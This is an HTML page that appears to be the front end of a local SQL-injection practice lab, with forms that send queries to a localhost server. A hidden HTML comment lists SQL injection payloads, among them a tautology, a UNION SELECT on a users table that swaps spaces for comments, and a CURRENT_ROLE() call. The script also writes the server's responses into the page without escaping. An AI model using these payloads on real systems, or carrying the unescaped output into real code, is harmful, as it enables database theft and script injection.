<!DOCTYPE html>
<head></head>
<body>
	<h1> Welcome<br>Please enter a username to get started.</h1>
	<input id = "POSTQueryStr" type="text" placeholder="POST Query">
	<button id="submitQueryPOST" type="button" placeholder="Submit">Submit</button>
	<br>
	<input id = "GETQueryStr" type="text" placeholder="GET Query">
	<button id="submitQueryGET" type="button" placeholder="Submit">Submit</button>
	<p id='QueryData'></p>
<!-- 
The slight nuance here is getting around the URL encoding, as the node is a barebones server that doesn't expect queries to contain unusual chars, it doesn't bother to decode them and instead just throws a 400 error with the returned data from the DB connection.

Some payloads:
'OR'1'='1
'/**/UNION/**/SELECT*FROM/**/users/**/WHERE/**/id>'
Use of functions in the query:
'/**/UNION/**/SELECT'*','*',CURRENT_ROLE()FROM/**/users/**/WHERE/**/id>'
-->
	<script>
		var button_POST = document.getElementById("submitQueryPOST");
		var button_GET = document.getElementById("submitQueryGET");
		var query;
		var para;
		var response;
		var response_data;
		var url;
		function init()
		{
			console.log("got into event");
			// query = document.getElementById("QueryStr").value;
			try 
			{
				para = document.getElementById("QueryData"); 
				url = `http://127.0.0.1:8000/?query=${query}`;
				if(query = document.getElementById("POSTQueryStr").value) { fetchData(url, "POST", para, query)}
				else if(query = document.getElementById("GETQueryStr").value) { fetchData(url, "GET", para, null)}
			}
			catch (error)
			{
				console.error(error.message);
			}
		}
		//for some reason GET needs 2 clicks to set the value of "para", whatever for now
			//update: it sets the value fine after the 1st click, it's the database querying that's the issue apparently.
		// should look into proper JS debugging tools
		async function fetchData(url, method, sink, query)
		{
			response = await fetch(url, {method: method, body:query, credentials: 'include'})
			.then(response => response.text())
			.then(data => para.innerHTML = data)
			.catch(error => console.log(error));
		}

		button_POST.addEventListener("click", init); 
		button_GET.addEventListener("click", init); 
	
	</script>
</body>
